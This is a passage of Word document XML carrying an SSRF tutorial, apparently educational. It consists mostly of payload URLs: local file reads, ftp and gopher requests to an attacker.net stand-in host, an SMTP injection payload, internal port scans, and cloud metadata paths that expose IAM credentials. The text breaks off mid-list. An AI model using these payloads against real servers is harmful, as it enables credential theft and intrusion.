    <w:p w14:paraId="471E3085" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Some common exploits for accessing internal files include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C383A40" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>https://target.com/page?url=file://etc/passwd</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>https://target.com/page?url=file:///etc/passwd</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>https://target.com/page?url=file:////etc/passwd</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>https://target.com/page?url=file://path/to/file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441FA495" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Accessing Internal Services via URL Scheme</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF9C15F" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>You can use a URL scheme to connect to certain services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647C19CC" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>For file transfer protocols:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F6A179" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>https://target.com/page?url=ftp://attacker.net:11211/</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>https://target.com/page?url=sftp://attacker.net:11111/</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>https://target.com/page?url=tftp://attacker.net:123456/TESTUDP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9D43D3" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Abusing LDAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3FB736" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>https://target.com/page?url=ldap://127.0.0.1/%0astats%0aquit</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>https://target.com/page?url=ldap://localhost:11211/%0astats%0aquit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56649059" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Makes request like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B027860" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>stats</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>quit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D0F71B" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Abusing Gopher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A4A6F1" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>https://target.com/page?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%attacker@attack.net%3E%250d%250aRCPT%20TO%3A%3Cvictim@target.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BAttacker%5D%20%3Cattacker@attack.net%3E%250d%250aTo%3A%20%3Cvictime@target.com%3E%250d%250aDate%3A%20Fri%2C%2013%20Mar%202020%2003%3A33%3A00%20-0600%250d%250aSubject%3A%20Hacked%250d%250a%250d%250aYou%27ve%20been%20exploited%20%3A%28%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA5471D" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Makes request like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A5FC06" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HELO localhost</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>MAIL FROM:&lt;attacker@attack.net&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>RCPT TO:&lt;victim@target.com&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t>DATA</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>From: [Attacker] &lt;attacker@attack.net&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>To: &lt;victim@target.com&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>Date: Fri, 13 Mar 2020  03:33:00 -0600</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>Subject: Hacked</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>You've been exploited :(</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>QUIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC25FE0" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. XSPA—Port Scanning on the Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE4EB37" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cross-Site Port Attack (XSPA) is a type of SSRF where an attacker is able to scan the server for its open ports. This is usually done by using the loopback interface on the server (127.0.0.1 or localhost) with the addition of the port that is being scanned (21, 22, 25…).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B208AD4" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Some examples are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7AA56E" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>https://target.com/page?url=http://localhost:22/</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>https://target.com/page?url=http://127.0.0.1:25/</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>https://target.com/page?url=http://127.0.0.1:3389/</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>https://target.com/page?url=http://localhost:PORT/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E295290" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Besides scanning for ports an attacker might also run a scan of running hosts by trying to ping private IP addresses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725143D6" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>192.168.0.0/16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A46DAB" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>172.16.0.0/12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690FF596" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.0.0.0/8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244D6BBD" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Obtaining Access to Cloud Provider Metadata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492AE8E2" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>With SSRF an attacker is able to read metadata of the cloud provider that you use, be it AWS, Google Cloud, Azure, DigitalOcean, etc. This is usually done by using the private addressing that the provider listed in their documentation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E34FAEC" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218AFAE4" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>For AWS instead of using localhost or 127.0.0.1 attackers use the 169.254.169.254 address for exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC7B76B" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Significant information can be extracted from AWS metadata, from public keys, security credentials, hostnames, IDs, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D485B8" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Some common exploits include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1ADBCD" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>https://target.com/page?url=http://169.254.169.254/latest/user-data</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>https://target.com/page?url=http://169.254.169.254/latest/user-data/iam/security-credentials/ROLE_NAME</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>https://target.com/page?url=http://169.254.169.254/latest/meta-data</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>https://target.com/page?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>https://target.com/page?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>https://target.com/page?url=http://169.254.169.254/latest/meta-data/ami-id</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>https://target.com/page?url=http://169.254.169.254/latest/meta-data/hostname</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>https://target.com/page?url=http://169.254.169.254/latest/meta-data/public-keys</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>https://target.com/page?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>https://target.com/page?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>https://target.com/page?url=http://169.254.169.254/latest/dynamic/instance-identity/document</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>https://target.com/page?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanorastalk-ec2-role</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246F4042" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Additional links can be found in the official documentation of AWS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B00F652" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DigitalOcean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF69988" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Similar to AWS, DigitalOcean uses 169.254.169.254 for their services and checks the documentation for more information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656CC5E7" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>https://target.com/page?url=http://169.254.169.254/metadata/v1.json</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>https://target.com/page?url=http://169.254.169.254/metadata/v1/id</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>https://target.com/page?url=http://169.254.169.254/metadata/v1/user-data</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>https://target.com/page?url=http://169.254.169.254/metadata/v1/hostname</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>https://target.com/page?url=http://169.254.169.254/metadata/v1/region</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>https://target.com/page?url=http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F12469" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760E7C6D" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure is more limited than other cloud providers in this regard.  Check the official documentation for more information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C848DA" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure requires header Metadata: true.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329F925C" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>https://target.com/page?url=http://169.254.169.254/metadata/maintenance</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>https://target.com/page?url=http://169.254.169.254/metadata/instance?api-</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>version=2019-10-01</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>https://target.com/page?url=http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2019-10-01&amp;format=text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBEB1FC" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Oracle Cloud</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BECCDD" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Oracle cloud uses the 192.0.0.192 address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C61C98" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>https://target.com/page?url=http://192.0.0.192/latest/</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>https://target.com/page?url=http://192.0.0.192/latest/meta-data/</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>https://target.com/page?url=http://192.0.0.192/latest/user-data/</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
